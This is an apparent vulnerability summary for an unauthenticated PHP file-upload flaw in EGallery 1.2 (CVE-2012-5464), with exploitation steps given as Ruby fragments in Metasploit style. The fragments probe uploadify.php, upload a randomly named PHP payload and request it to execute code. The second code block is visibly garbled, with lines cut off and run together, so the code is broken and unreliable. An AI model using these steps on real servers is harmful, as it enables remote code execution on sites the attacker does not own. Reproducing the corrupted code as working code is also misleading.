## Critical Vulnerability Information - **Vulnerability Name**: EGallery PHP File Upload Vulnerability - **Description**: In EGallery 1.2, malicious users can exploit the `uploadify.php` file to upload files to the `egallery/` directory without any authentication, leading to arbitrary code execution. - **Affected Versions**: EGallery 1.2 - **CVE ID**: CVE-2012-5464 - **Disclosure Date**: 2012-07-08 - **Exploitation Method**: - Malicious users can upload PHP files to the server's `egallery` directory. - A POST request is sent containing a file with malicious PHP code. - After successful upload, the PHP file is executed via a GET request to achieve code execution. ### Exploitation Steps 1. **Check Target URL**: ```ruby uri = normalize_uri(target_uri.path) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "egallery", "uploadify.php") }) ``` 2. **Construct and Send Malicious File**: ```ruby payload_name = rand_text_alpha(rand(10) + 5) + '.php' boundary = "---------------------------" + rand_text_hex(7) post_data = "--#{boundary}\r\n" post_data \r\n" post_data 'GET', 'uri' => normalize_uri("#{uri}#{payload_name}") }) ``` ### Notes - **Reliability**: Unknown - **Stability**: Unknown - **Side Effects**: Unknown